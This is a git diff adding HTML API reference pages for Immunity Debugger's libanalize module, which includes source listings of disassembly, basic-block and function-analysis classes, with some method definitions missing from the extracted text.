+ DECR_TYPEMASK
+ None
+
+ Value:
+
+
+
+
+ DECR_BYTE
+ None
+
+ Value:
+
+
+
+
+ DECR_WORD
+ None
+
+ Value:
+
+
+
+
+ DECR_DWORD
+ None
+
+ Value:
+
+
+
+
+ DECR_QWORD
+ None
+
+ Value:
+
+
+
+
+ DECR_FLOAT10
+ None
+
+ Value:
+
+
+
+
+ DECR_SEG
+ None
+
+ Value:
+
+
+
+
+ DECR_3DNOW
+ None
+
+ Value:
+
+
+
+
+ DECR_SSE
+ None
+
+ Value:
+
+
+
+
+ DECR_ISREG
+ None
+
+ Value:
+
+
+
+
+ DEC_CONST
+ None
+
+ Value:
+
+
+
+
+ RegisterName
+ None
+
+ Value:
+
+{(0, 0, 0, 0, 0, 0, 0, 0): '',
+ (0, 0, 0, 0, 0, 0, 0, 1): 'EDI',
+ (0, 0, 0, 0, 0, 0, 1, 0): 'ESI',
+ (0, 0, 0, 0, 0, 1, 0, 0): 'EBP',
+ (0, 0, 0, 0, 1, 0, 0, 0): 'ESP',
+ (0, 0, 0, 1, 0, 0, 0, 0): 'EBX',
+ (0, 0, 1, 0, 0, 0, 0, 0): 'EDX',
+ (0, 1, 0, 0, 0, 0, 0, 0): 'ECX',
+...
+
+
+
+
+ COUNT
+ None
+
+ Value:
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize-pysrc.html b/1.73/Documentation/Ref/Libs.libanalize-pysrc.html
new file mode 100755
index 0000000..7fa4ffd
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize-pysrc.html
@@ -0,0 +1,1965 @@
+
+
+
+
+ Libs.libanalize
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+ Package Libs ::
+ Module libanalize
+
+
+
+
+
+
+
+
+
+ 1
+ 2
+ 3 """ 4 (c) Immunity, Inc. 2004-2007 5 6 7 U{Immunity Inc.<http://www.immunityinc.com>} 8 9 10 """ 11
+ 12 __VERSION__ = '1.3'
+ 13
+ 14 import UserList 15 import debugger 16
+ 17
+ 18 RST_INVALID = 0
+ 19 RST_VALUE = 1
+ 20 RST_VFIXUP = 2
+ 21 RST_INDIRECT = 3
+ 22
+ 23
+ 24
+ 25 DISASM_SIZE = 0
+ 26 DISASM_DATA = 1
+ 27 DISASM_TRACE = 2
+ 28 DISASM_FILE = 3
+ 29 DISASM_CODE = 4
+ 30 DISASM_ALL = 5
+ 31 DISASM_RTRACE = 6
+ 32
+ 33
+ 34 C_TYPEMASK = 0xF0
+ 35 C_CMD = 0x00
+ 36 C_PSH = 0x10
+ 37 C_POP = 0x20
+ 38 C_MMX = 0x30
+ 39 C_FLT = 0x40
+ 40 C_JMP = 0x50
+ 41 C_JMC = 0x60
+ 42 C_CAL = 0x70
+ 43 C_RET = 0x80
+ 44 C_FLG = 0x90
+ 45 C_RTF = 0xA0
+ 46 C_REP = 0xB0
+ 47 C_PRI = 0xC0
+ 48 C_SSE = 0xD0
+ 49 C_NOW = 0xE0
+ 50 C_BAD = 0xF0
+ 51
+ 52
+ 53 DEC_TYPEMASK = 0x1F
+ 54 DEC_UNKNOWN = 0x00
+ 55 DEC_BYTE = 0x01
+ 56 DEC_WORD = 0x02
+ 57 DEC_NEXTDATA = 0x03
+ 58 DEC_DWORD = 0x04
+ 59 DEC_FLOAT4 = 0x05
+ 60 DEC_FWORD = 0x06
+ 61 DEC_FLOAT8 = 0x07
+ 62 DEC_QWORD = 0x08
+ 63 DEC_FLOAT10 = 0x09
+ 64 DEC_TBYTE = 0x0A
+ 65 DEC_STRING = 0x0B
+ 66 DEC_UNICODE = 0x0C
+ 67 DEC_3DNOW = 0x0D
+ 68 DEC_SSE = 0x0E
+ 69 DEC_TEXT = 0x10
+ 70 DEC_BYTESW = 0x11
+ 71 DEC_NEXTCODE = 0x13
+ 72 DEC_COMMAND = 0x1D
+ 73 DEC_JMPDEST = 0x1E
+ 74 DEC_CALLDEST = 0x1F
+ 75
+ 76 DEC_PROCMASK = 0x60
+ 77 DEC_PROC = 0x20
+ 78 DEC_PBODY = 0x40
+ 79 DEC_PEND = 0x60
+ 80
+ 81 DEC_CHECKED = 0x80
+ 82 DEC_SIGNED = 0x100
+ 83
+ 84 DECR_TYPEMASK = 0x3F
+ 85 DECR_BYTE = 0x21
+ 86 DECR_WORD = 0x22
+ 87 DECR_DWORD = 0x24
+ 88 DECR_QWORD = 0x28
+ 89 DECR_FLOAT10 = 0x29
+ 90 DECR_SEG = 0x2A
+ 91 DECR_3DNOW = 0x2D
+ 92 DECR_SSE = 0x2E
+ 93
+ 94 DECR_ISREG = 0x20
+ 95 DEC_CONST = 0x40
+ 96
+ 97 RegisterName = { ( 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ) : "" , ( 1 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ) : "EAX" , ( 0 , 1 , 0 , 0 , 0 , 0 , 0 , 0 ) : "ECX" , \
+ 98 ( 0 , 0 , 1 , 0 , 0 , 0 , 0 , 0 ) : "EDX" , ( 0 , 0 , 0 , 1 , 0 , 0 , 0 , 0 ) : "EBX" , ( 0 , 0 , 0 , 0 , 1 , 0 , 0 , 0 ) : "ESP" , \
+ 99 ( 0 , 0 , 0 , 0 , 0 , 1 , 0 , 0 ) : "EBP" , ( 0 , 0 , 0 , 0 , 0 , 0 , 1 , 0 ) : "ESI" , ( 0 , 0 , 0 , 0 , 0 , 0 , 0 , 1 ) : "EDI" }
+ 100
+ 101 COUNT = 100
+
104 self . imm = imm
+ 105 self . address = addr
+ 106 self . operand = [ ]
+
107
+
108
+
110 self . ip = opcode [ 0 ]
+
111 self . dump = opcode [ 1 ]
+
112 self . result = opcode [ 2 ]
+
113 self . comment = opcode [ 3 ]
+
114 self . opinfo = opcode [ 4 ]
+
115 self . cmdtype = opcode [ 5 ]
+
116 self . memtype = opcode [ 6 ]
+
117 self . nprefix = opcode [ 7 ]
+
118 self . indexed = opcode [ 8 ]
+
119 self . jmpconst = opcode [ 9 ]
+
120 self . jmptable = opcode [ 10 ]
+
121 self . adrconst = opcode [ 11 ]
+
122 self . immconst = opcode [ 12 ]
+
123 self . zeroconst = opcode [ 13 ]
+
124 self . fixupoffset = opcode [ 14 ]
+
125 self . fixupsize = opcode [ 15 ]
+
126 self . jmpaddr = opcode [ 16 ]
+
127 self . condition = opcode [ 17 ]
+
128 self . error = opcode [ 18 ]
+
129 self . warnings = opcode [ 19 ]
+
130 self . optype = opcode [ 20 ]
+
131 self . operandsize = opcode [ 21 ]
+
132 self . opsize = opcode [ 22 ]
+
133 self . opgood = opcode [ 23 ]
+
134 self . opaddr = opcode [ 24 ]
+
135 self . opdata = opcode [ 25 ]
+
136
+
137
+
138
+
139
+
140
+
141
+
142 self . operand = opcode [ 26 ]
+
143
+
144
+
145 self . regdata = opcode [ 27 ]
+
146 self . addrdata = opcode [ 28 ]
+
147 self . addrstatus = opcode [ 29 ]
+
148 self . regstack = opcode [ 30 ]
+
149
+
150
+
151
+
152
+
154 try :
+
155 return RegisterName [ self . operand [ num ] [ 2 ] ]
+
156 except KeyError :
+
157 return "[]"
+
158
+
160 return self . ip
+
161
+
163 return self . address
+
164
+
166 return self . dump
+
167
+
169 return self . result
+
170
+
172 return self . result
+
173
+
175 return self . comment
+
176
+
178 return self . opinfo
+
179
+
182
+
185
+
188
+
191
+
194
+
197
+
200
+
203
+
205 return self . cmdtype
+
206
+
210
+
212 return self . memtype
+
213
+
215 return self . nprefix
+
216
+
218 return self . indexed
+
219
+
221 return self . jmpconst
+
222
+
224 return self . jmptable
+
225
+
227 return self . adrconst
+
228
+
230 return self . immconst
+
231
+
233 return self . zeroconst
+
234
+
236 return self . fixupoffset
+
237
+
239 return self . fixupsize
+
240
+
242 return self . jmpaddr
+
243
+
245 return self . condition
+
246
+
249
+
251 return self . warnings
+
252
+
254 return self . optype
+
255
+
257 return self . opsize
+
258
+
260 return self . opsize
+
261
+
263 return self . opgood
+
264
+
266 return self . opaddr
+
267
+
269 return self . opdata
+
270
+
272 return self . regdata
+
273
+
275 return self . regdata
+
276
+
278 return self . addrdata
+
279
+
281 return self . addrstatus
+
282
+
284 return self . regstack
+
285
+
287 return self . regstack
+
288
+
290 return "deprecated"
+
291
+
292
+
293
+
294
+
296 return debugger . Getinfopanel ( )
+
297
+ 298 - class Decode ( UserList . UserList ) :
+
300 """
+
301 Internal Information of the Analyzed Code
+
302
+
303 @type address: DWORD
+
304 @param address: Address in the range of the analized code you want to retrieve
+
305 """
+
306 UserList . UserList . __init__ ( self )
+
307 self . address = address
+
308 self . data = debugger . FindDecode ( address )
+
309
+
311 try :
+ 312 return ord ( self . data [ i - self . address ] )
+ 313 except IndexError :
+ 314 raise IndexError , "Address 0x%08x not in this Decode" % i
+
315
+
317 self . data [ i - self . address ] = item
+
318
+
320 """
+
321 Check Whether or not the provided address is a destination for a jmp instruction
+
322
+
323 @type i: DWORD
+
324 @param i: Address to check
+
325
+
326 @rtype: BOOLEAN
+
327 @return: Whether or not the provided address is a destination for a jmp instruction
+
328 """
+
329 return ( self . __getitem__ ( i ) & DEC_TYPEMASK ) == DEC_JMPDEST
+
330
+
332 """
+
333 Check Whether or not the provided address is a destination for a call instruction
+
334
+
335 @type i: DWORD
+
336 @param i: Address to check
+
337
+
338 @rtype: BOOLEAN
+
339 @return: Whether or not the provided address is a destination for a call instruction
+
340 """
+
341 return ( self . __getitem__ ( i ) & DEC_TYPEMASK ) == DEC_CALLDEST
+
342
+
344 """
+
345 Check Whether or not the provided address has a command (regular opcode)
+
346
+
347 @type i: DWORD
+
348 @param i: Address to check
+
349
+
350 @rtype: BOOLEAN
+
351 @return: Whether or not the provided address a command (regular opcode)
+
352 """
+
353 return ( self . __getitem__ ( i ) & DEC_TYPEMASK ) == DEC_COMMAND
+
354
+
356 """
+
357 Check Whether or not the provided address is the begging of a Function
+
358
+
359 @type i: DWORD
+
360 @param i: Address to check
+
361
+
362 @rtype: BOOLEAN
+
363 @return: Whether or not the provided address is the begging of a Function
+
364 """
+
365 return ( self . __getitem__ ( i ) & DEC_PROCMASK ) == DEC_PROC
+
366
+
367 - def isFunctionBody ( self , i ) :
+
368 """
+
369 Check Whether or not the provided address is part of a Function
+
370
+
371 @type i: DWORD
+
372 @param i: Address to check
+
373
+
374 @rtype: BOOLEAN
+
375 @return: Check Whether or not the provided address is part of a Function
+
376 """
+
377 return ( self . __getitem__ ( i ) & DEC_PROCMASK ) == DEC_PBODY
+
378
+ 379
+
381 """
+
382 Class that contains information about a Function
+
383 """
+
385 """
+ 386 Class that contains information about a Function 387 388 @type imm: Debbuger OBJECT 389 @param imm: Debbuger 390 391 @type start: DWORD 392 @param start: Address of the begging of the function 393 """ 394 if not start :
+ 395 raise Exception , "Wrong Function Address: 0x%08x" % start
+ 396
+ 397 self . start = start
+ 398 self . imm = imm
+ 399 self . bb = [ ]
+ 400 self . bbhash = { }
+
401
+
403 """
+ 404 Change the start of a Function 405 406 @type address: DWORD 407 @param address: New address of the function 408 """ 409 self . start = address
+
410
+
411
+
413 """
+ 414 Get the Address of the Function 415 416 @rtype: DWORD 417 @return: Address of the function 418 """ 419 return self . start
+
420
+
422 """
+
423 Get the name of the Function
+
424
+
425 @rtype: STRING
+
426 @return: Name of the Function
+
427 """
+
428 return self . imm . decodeAddress ( self . start )
+
429
+
437
+
439 """
+
440 Get the end of the Function (Understanding end as the Basic Block with a ret inside)
+
441
+
442 @rtype: LIST of BasicBlock
+
443 @return: A list of all the basic block that end the function
+
444 """
+
445 ret = [ ]
+
446 bb = self . getBasicBlocks ( )
+
447 for a in bb :
+
448 if a . isRet ( ) :
+
449 ret . append ( a )
+
450 return ret
+
451
+
453 """
+
454 Find all the possible ret values on a function (Beta)
+
455 Note: This function only check the modifiers on a Ret BasicBlock, so the result might not be precise.
+
456
+
457 @type start: LIST OF OPCODE
+
458 @param start: Return all the possible modifiers of EAX
+
459 """
+
460 ret = [ ]
+
461 endblocks = self . getEnd ( )
+
462 for bb in endblocks :
+
463 opcodes = bb . getInstructions ( self . imm )
+
464
+
465
+
466 for a in range ( len ( opcodes ) - 1 , 0 , - 1 ) :
+
467 op = opcodes [ a ]
+
468 if op . getOperandRegister ( 0 ) == "EAX" and op . optype [ 0 ] == 36 :
+
469 ret . append ( op )
+
470 break
+
471 return ret
+
472
+
473
+
475 """
+
476 Check if the given address is part of the Function
+
477
+
478 @type address: DWORD
+
479 @param force: Address of the instruction to check
+
480
+
481 @rtype: BasicBlock object
+
482 @return: If true, returns the corresponding Basic block else returns None
+
483 """
+
484 bb = self . getBasicBlocks ( )
+
485 for b in bb :
+
486 if address >= b . start and address <= b . end :
+
487 return b
+
488 return None
+
489
+
491 """
+
492 Get basic block from the current Function
+
493
+
494 @type force: BOOLEAN
+
495 @param force: (Optional, Def: False) Force to Function to reparse the basic blocks
+
496
+
497 @rtype: LIST of BasicBlock objects
+
498 @return: Basic blocks of the current function
+
499
+
500
+
501 TODO: Recursion here is bad - we need to make this an iterative process with a work queue
+
502 """
+
503 if self . bb and not force :
+
504 return self . bb
+
505
+
506 op = None
+
507 if not self . imm . isAnalysed ( self . start ) :
+
508 self . imm . analyseCode ( self . start )
+
509
+
510
+
511
+
512
+
513
+
514 self . _getBB ( self . start )
+
515
+
516 return self . bb
+
517
+
518
+
519
+
520
+
522 decode = self . imm . findDecode ( address )
+
523 if not decode :
+
524 raise Exception , "Couldn't find a proper Decode for address 0x%08x" % address
+
525 start = address
+
526 calls = [ ]
+
527 while 1 :
+
528
+
529
+
530 if decode . isJmpDestination ( address ) and start != address :
+
531
+
532 if self . bbhash . has_key ( start ) :
+
533 return
+
534
+
535 op = self . imm . Disasm ( address )
+
536 bb = XREFBasicBlock ( start , address )
+
537 bb . setFunction ( self )
+
538 bb . addTrueEdge ( address )
+
539 bb . setCalls ( calls )
+
540 if calls :
+
541 bb . setCalls ( calls )
+
542 calls = [ ]
+
543 self . bb . append ( bb )
+
544 self . bbhash [ start ] = 1
+
545 start = address
+
546 if self . bbhash . has_key ( address ) :
+
547 return
+
548
+
549
+
550 op = self . imm . Disasm ( address )
+
551
+
552
+
553
+
554
+
555 if op . isConditionalJmp ( ) :
+
556
+
557 self . bbhash [ start ] = 1
+
558 bb = JMCBasicBlock ( start , address + op . getSize ( ) )
+
559 if calls :
+
560 bb . setCalls ( calls )
+
561 calls = [ ]
+
562 start = address + op . getSize ( )
+
563 bb . setFunction ( self )
+
564 bb . addTrueEdge ( op . getJmpConst ( ) )
+
565 bb . addFalseEdge ( start )
+
566 self . bb . append ( bb )
+
567
+
568
+
569 if not self . bbhash . has_key ( op . getJmpConst ( ) ) :
+
570 self . _getBB ( op . getJmpConst ( ) )
+
571 op = self . imm . Disasm ( address )
+
572
+
573 if self . bbhash . has_key ( start ) :
+
574 return
+
575
+
576
+
577
+
578 elif op . isJmp ( ) :
+
579 if not self . bbhash . has_key ( address ) :
+
580
+
581 self . bbhash [ start ] = 1
+
582 bb = JMPBasicBlock ( start , address + op . getSize ( ) )
+
583 bb . setFunction ( self )
+
584 bb . addTrueEdge ( op . getJmpConst ( ) )
+
585 if calls :
+
586 bb . setCalls ( calls )
+
587 calls = [ ]
+
588 self . bb . append ( bb )
+
589 start = address + op . getSize ( )
+
590 if not self . bbhash . has_key ( op . getJmpConst ( ) ) :
+
591
+
592
+
593 try :
+
594 decode [ op . getJmpConst ( ) ]
+
595 self . _getBB ( op . getJmpConst ( ) )
+
596 except Exception :
+
597 pass
+
598 return
+
599
+
600
+
601
+
602 elif op . isRet ( ) :
+
603
+
604 self . bbhash [ start ] = 1
+
605 bb = RETBasicBlock ( start , address + op . getSize ( ) )
+
606 bb . setFunction ( self )
+
607 if calls :
+
608 bb . setCalls ( calls )
+
609 calls = [ ]
+
610 self . bb . append ( bb )
+
611 return
+
612 elif op . isCall ( ) :
+
613 calls . append ( address )
+
614
+
615 address += op . getSize ( )
+
616
+ 617
+ 618
+
621 """
+
622 Basic Block class
+
623
+
624 @type start: DWORD
+
625 @param start: Address of the begging of the Basic Block
+
626
+
627 @type end: DWORD
+
628 @param end: Address of the end of the Basic Block
+
629 """
+
630 self . edgeamount = 0
+
631 self . start = start
+
632 self . end = end
+
633 self . calls = [ ]
+
634
+
635 self . Function = None
+
636
+
637
+
638
+
641
+
644
+
646 self . calls = calls
+
647
+
649 return self . calls
+
650
+
652 """
+ 653 Comparision by the start address of the BB 654 """ 655 return cmp ( self . start , other . start )
+
656
+
658 """
+ 659 Change the start of a Basic Block 660 661 @type address: DWORD 662 @param address: New address of the Basic Block 663 """ 664 self . start = address
+
665
+
667 self . trueedge = addr
+
668
+
670 self . falseedge = addr
+
671
+
673 if not self . edgeamount :
+ 674 return ( 0 , 0 )
+ 675 elif self . edgeamount == 1 :
+ 676 if self . trueedge == 0 :
+ 677 return ( 0 , 0 )
+ 678 else :
+ 679 return ( self . trueedge , 0 )
+ 680 else :
+ 681 return ( self . trueedge , self . falseedge )
+
682
+
684 """
+ 685 Get the 'true' Edge 686 687 @rtype: DWORD 688 @return: 'True' Edge of the Basic Block 689 """ 690 if not self . edgeamount :
+ 691 return None
+ 692 elif self . edgeamount != 1 :
+ 693 return self . trueedge
+
694
+
696 """
+ 697 Get the 'false' Edge 698 699 @rtype: DWORD 700 @return: 'False' Edge of the Basic Block (The 'false' edge, is not always present. Depends of the Basic Block) 701 """ 702 if not self . edgeamount :
+ 703 return None
+ 704 elif self . edgeamount != 1 :
+ 705 return self . falseedge
+
706
+
708 """
+ 709 Get the Edges of a Basic Block 710 711 @rtype: TUPLE of DWORD 712 @return: The Edge of the Basic Block (Might change depending of the basic block type) 713 """ 714 if not self . edgeamount :
+ 715 return ( )
+ 716 elif self . edgeamount == 1 :
+ 717 if self . trueedge == 0 :
+ 718 return ( )
+ 719 else :
+ 720 return self . trueedge
+
721
+
723 """
+ 724 Return the Size of the Basic Block 725 726 @rtype: DWORD 727 @return: Size of the Basic Block 728 """ 729 return self . end - self . start
+
730
+
732 """
+ 733 Change the end of a Basic Block 734 735 @type address: DWORD 736 @param address: New address of the Basic Block end 737 """ 738
+ 739 self . end = address
+
741 """
+ 742 Get the limits of the basic block 743 744 @rtype: TUPLE OF DWORD 745 @return: (Beginning of BB, End of BB) 746 """ 747 return ( self . start , self . end )
+
748
+
750 """
+ 751 Get the begging of a Basic Block 752 753 @rtype: DWORD 754 @return: Beginning of the Basic Block 755 """ 756 return self . start
+
757
+
759 """
+ 760 Get the End of a Basic Block 761 762 @rtype: DWORD 763 @return: End of the Basic Block 764 """ 765 return self . end
+
766
+
767
+
769 """
+
770 Get the disassembled instructions from a Basic Block
+
771
+
772 @type imm: Debugger OBJECT
+
773 @param imm: Debugger
+
774
+
775 @rtype: LIST of opCode OBJECT
+
776 @return: List of disassembled instructions
+
777 """
+
778 addr = self . start
+
779 instructions = [ ]
+
780
+
781 while addr < self . end :
+
782 op = imm . Disasm ( addr )
+
783 instructions . append ( op )
+
784 addr += op . getSize ( )
+
785
+
786 return instructions
+
787
+
789 """
+
790 Check if a Basic Block was created from an XREF
+
791
+
792 @rtype: BOOLEAN
+
793 @return: Whether the Basic Block was created from an XREF
+
794 """
+
795 return isinstance ( self , XREFBasicBlock )
+
796
+
798 """
+
799 Check if a Basic Block was created from a Conditional Jump instruction
+
800
+
801 @rtype: BOOLEAN
+
802 @return: Whether the Basic Block was created from a Conditional Jump instruction
+
803 """
+
804 return isinstance ( self , JMCBasicBlock )
+
805
+
807 """
+
808 Check if a Basic Block was created from a Jump instruction
+
809
+
810 @rtype: BOOLEAN
+
811 @return: Whether the Basic Block was created from a Jump instruction
+
812 """
+
813 return isinstance ( self , JMPBasicBlock )
+
814
+
816 """
+
817 Check if a Basic Block was created from a RET instruction
+
818
+
819 @rtype: BOOLEAN
+
820 @return: Whether the Basic Block was created from a RET instruction
+
821 """
+
822 return isinstance ( self , RETBasicBlock )
+
823
+
826 """
+
827 XREF Basic Block, Basic Block created from a code reference
+
828
+
829 @type start: DWORD
+
830 @param start: Address of the begging of the Basic Block
+
831
+
832 @type end: DWORD
+
833 @param end: Address of the end of the Basic Block
+
834 """
+
835 BasicBlock . __init__ ( self , start , end )
+
836 self . edgeamount = 1
+
837
+
840 """
+
841 Conditional Jump Basic Block, Basic Block created from a conditional jump instruction (branch node)
+
842
+
843 @type start: DWORD
+
844 @param start: Address of the begging of the Basic Block
+
845
+
846 @type end: DWORD
+
847 @param end: Address of the end of the Basic Block
+
848 """
+
849 BasicBlock . __init__ ( self , start , end )
+
850 self . edgeamount = 2
+
851
+ 852
+ 853
+ 854
+
857 """
+
858 Jump Basic Block, Basic Block created from a jump instruction
+
859
+
860 @type start: DWORD
+
861 @param start: Address of the begging of the Basic Block
+
862
+
863 @type end: DWORD
+
864 @param end: Address of the end of the Basic Block
+
865 """
+
866 BasicBlock . __init__ ( self , start , end )
+
867 self . edgeamount = 1
+
868
+
871 """
+
872 RET Basic Block, Basic Block created from a RET instruction (exit node)
+
873
+
874 @type start: DWORD
+
875 @param start: Address of the begging of the Basic Block
+
876
+
877 @type end: DWORD
+
878 @param end: Address of the end of the Basic Block
+
879 """
+
880 BasicBlock . __init__ ( self , start , end )
+
881 self . edgeamount = 0
+
882
+
884 - def __init__ ( self , imm , func_address , tracedarg , shownonusersupplied = False ) :
+
885 self . imm = imm
+ 886 self . func_address = func_address
+ 887 self . tracedarg = tracedarg
+ 888 self . shownonusersupplied = shownonusersupplied
+
889
+
891 idx = 0
+
892 stack = [ ]
+
893 address = self . func_address
+
894
+
895
+
896 while idx < COUNT :
+
897 op = self . imm . disasmBackward ( address )
+
898 if op . isPush ( ) :
+
899 stack . append ( 1 )
+
900 if len ( stack ) == self . tracedarg :
+
901 break
+
902 elif op . isPop ( ) :
+
903 if len ( stack ) :
+
904 stack . pop ( 0 )
+
905 else :
+
906 return
+
907 address = op . getAddress ( )
+
908 del op
+
909 idx += 1
+
910
+
911
+
912 if idx < COUNT :
+
913
+
914 dotraceback = True
+
915 if not op . isPush ( ) :
+
916
+
917 return ( )
+
918
+
919
+
920
+
921 if op . getOperandRegister ( 0 ) == "" :
+
922 if not self . shownonusersupplied :
+
923 return ( )
+
924 else :
+
925 return ( op , [ ] )
+
926
+
927
+
928
+
929
+
930
+
931 elif op . getOperandRegister ( 0 ) == "EBP" and op . operand [ 0 ] [ 3 ] :
+
932 dotraceback = False
+
933
+
934
+
935 show = [ ]
+
936
+
937
+
938 if dotraceback :
+
939 self . modarg = [ ]
+
940 self . visited = [ ]
+
941
+
942 try :
+
943 self . traceArgBackWithDecode ( op . getAddress ( ) , op . operand [ 0 ] [ 2 ] )
+
944 except IndexError :
+
945 op = self . traceArgBack ( op . getAddress ( ) , op . operand [ 0 ] [ 2 ] )
+
946 if op :
+
947 self . modarg . append ( op )
+
948
+
949 newop = None
+
950
+
951 type = ""
+
952 for newop in self . modarg :
+
953 newop . type = ""
+
954
+
955
+
956 if newop . getOperandRegister ( 1 ) == "" :
+
957 if self . shownonusersupplied or newop . isCall ( ) :
+
958 show . append ( newop )
+
959 else :
+
960 return ( )
+
961 else :
+
962 type = ""
+
963
+
964 if newop . getOperandRegister ( 1 ) == "EBP" :
+
965 if newop . operand [ 1 ] [ 3 ] < 0x80000000 :
+
966 newop . type = "VARS"
+
967 else :
+
968 newop . type = "ARGS"
+
969
+
970 show . append ( newop )
+
971
+
972 op . type = ""
+
973
+
974
+
975 if op . getOperandRegister ( 0 ) == "EBP" :
+
976 if op . operand [ 0 ] [ 3 ] < 0x80000000 and op . operand [ 0 ] [ 3 ] != 0 :
+
977 op . type = "<VARS>"
+
978 elif op . operand [ 0 ] [ 3 ] > 0x80000000 :
+
979 op . type = "<ARGS>"
+
980
+
981
+
982
+
983
+
984
+
985
+
986 return ( op , show )
+
987
+
988 return ( )
+
989
+
990
+
991
+
992
+
993
+
995 idx = 0
+
996 decode = self . imm . findDecode ( address )
+
997
+
998 while idx < COUNT :
+
999 if address in self . visited :
+
1000 return 0
+
1001 op = self . imm . disasmBackward ( address )
+
1002
+
1003 self . visited . append ( address )
+
1004 if op . isJmp ( ) :
+
1005 return 0
+
1006 if op . getResult ( ) [ : 3 ] in ( "MOV" , "XOR" ) :
+
1007
+
1008
+
1009 if op . operand [ 0 ] [ 2 ] == register :
+
1010 self . modarg . append ( op )
+
1011 return 0
+
1012
+
1013
+
1014
+
1015 elif register == ( 1 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ) and op . isCall ( ) :
+
1016 self . modarg . append ( op )
+
1017 return 0
+
1018
+
1019 if decode . isJmpDestination ( address ) :
+
1020 for ref in self . imm . getXrefFrom ( address ) :
+
1021 self . traceArgBackWithDecode ( ref [ 0 ] , register )
+
1022
+
1023 address = op . getAddress ( )
+
1024 idx += 1
+
1025 if decode :
+
1026
+
1027 if decode . isFunctionStart ( address ) :
+
1028 del decode
+
1029 return None
+
1030 del op
+
1031
+
1032 del decode
+
1033 return None
+
1034
+
1035
+
1036
+
1037
+
1038
+
1039
+
1041 idx = 0
+
1042 decode = self . imm . findDecode ( address )
+
1043
+
1044 while idx < COUNT :
+
1045 op = self . imm . disasmBackward ( address )
+
1046 if op . getResult ( ) [ : 3 ] == "MOV" :
+
1047
+
1048
+
1049 if op . operand [ 0 ] [ 2 ] == register :
+
1050 return op
+
1051
+
1052
+
1053
+
1054 elif register == ( 1 , 0 , 0 , 0 , 0 , 0 , 0 , 0 ) and op . isCall ( ) :
+
1055 return op
+
1056
+
1057 address = op . getAddress ( )
+
1058 idx += 1
+
1059 if decode :
+
1060
+
1061 if decode . isFunctionStart ( address ) :
+
1062 del decode
+
1063 return None
+
1064 del op
+
1065
+
1066 del decode
+
1067 return None
+
1068
+
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+
+
+
+
diff --git a/1.73/Documentation/Ref/Libs.libanalize.BasicBlock-class.html b/1.73/Documentation/Ref/Libs.libanalize.BasicBlock-class.html
new file mode 100755
index 0000000..f22e1d5
--- /dev/null
+++ b/1.73/Documentation/Ref/Libs.libanalize.BasicBlock-class.html
@@ -0,0 +1,839 @@
+
+
+
+
+ Libs.libanalize.BasicBlock
+
+
+
+
+ Trees
+
+
+ Indices
+
+
+ Help
+
+
+
+
+ Immunity Debugger API Reference
+
+
+
+
+
+Class BasicBlock source code Known Subclasses:
+
+ JMCBasicBlock ,
+ JMPBasicBlock ,
+ RETBasicBlock ,
+ XREFBasicBlock
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )
+
+
+
+
+
+ setFunction (self ,
+ function )
+
+
+
+
+
+ getFunction (self )
+
+
+
+
+
+ setCalls (self ,
+ calls )
+
+
+
+
+
+ getCalls (self )
+
+
+
+
+
+ __cmp__ (self ,
+ other )
+
+
+
+
+
+ setStart (self ,
+ address )
+
+
+
+
+
+ addTrueEdge (self ,
+ addr )
+
+
+
+
+
+ addFalseEdge (self ,
+ addr )
+
+
+
+
+
+ getEdges (self )
+
+
+
+ DWORD
+
+ getTrueEdge (self )
+
+
+
+ DWORD
+
+ getFalseEdge (self )
+
+
+
+ TUPLE of DWORD
+
+ getDirectEdge (self )
+
+
+
+ DWORD
+
+ getSize (self )
+
+
+
+
+
+ setEnd (self ,
+ address )
+
+
+
+ TUPLE OF DWORD
+
+ getLimits (self )
+
+
+
+ DWORD
+
+ getStart (self )
+
+
+
+ DWORD
+
+ getEnd (self )
+
+
+
+ LIST of opCode OBJECT
+
+ getInstructions (self ,
+ imm )
+
+
+
+ BOOLEAN
+
+ isXref (self )
+
+
+
+ BOOLEAN
+
+ isConditionalJmp (self )
+
+
+
+ BOOLEAN
+
+ isJmp (self )
+
+
+
+ BOOLEAN
+
+ isRet (self )
+
+
+
+
+
+
+
+
+ __init__ (self ,
+ start ,
+ end )(Constructor)
+ source code
+
+ Basic Block class
+
+ Parameters:
+ startDWORD) - Address of the begging of the Basic BlockendDWORD) - Address of the end of the Basic Block
+
+
+
+
+
+
+ __cmp__ (self ,
+ other )(Comparison operator)
+ source code
+
+ Comparision by the start address of the BB
+
+
+
+
+
+
+
+ Change the start of a Basic Block
+
+ Parameters:
+ addressDWORD) - New address of the Basic Block
+
+
+
+
+
+
+ Get the 'true' Edge
+
+ Returns: DWORD
+ 'True' Edge of the Basic Block
+
+
+
+
+
+ Get the 'false' Edge
+
+ Returns: DWORD
+ 'False' Edge of the Basic Block (The 'false' edge, is not
+ always present. Depends of the Basic Block)
+
+
+
+
+
+ Get the Edges of a Basic Block
+
+ Returns: TUPLE of DWORD
+ The Edge of the Basic Block (Might change depending of the
+ basic block type)
+
+
+
+
+
+ Return the Size of the Basic Block
+
+ Returns: DWORD
+ Size of the Basic Block
+
+
+
+
+
+ Change the end of a Basic Block
+
+ Parameters:
+ addressDWORD) - New address of the Basic Block end
+
+
+
+
+
+
+ Get the limits of the basic block
+
+ Returns: TUPLE OF DWORD
+ (Beginning of BB, End of BB)
+
+
+
+
+
+ Get the begging of a Basic Block
+
+ Returns: DWORD
+ Beginning of the Basic Block
+
+
+
+
+
+ Get the End of a Basic Block
+
+ Returns: DWORD
+ End of the Basic Block
+
+
+
+
+
+ Get the disassembled instructions from a Basic Block
+
+ Parameters:
+ immDebugger OBJECT) - Debugger
+ Returns: LIST of opCode OBJECT
+ List of disassembled instructions
+
+
+
+
+
+ Check if a Basic Block was created from an XREF
+
+ Returns: BOOLEAN
+ Whether the Basic Block was created from an XREF
+
+
+
+
+
+ Check if a Basic Block was created from a Conditional Jump
+ instruction
+
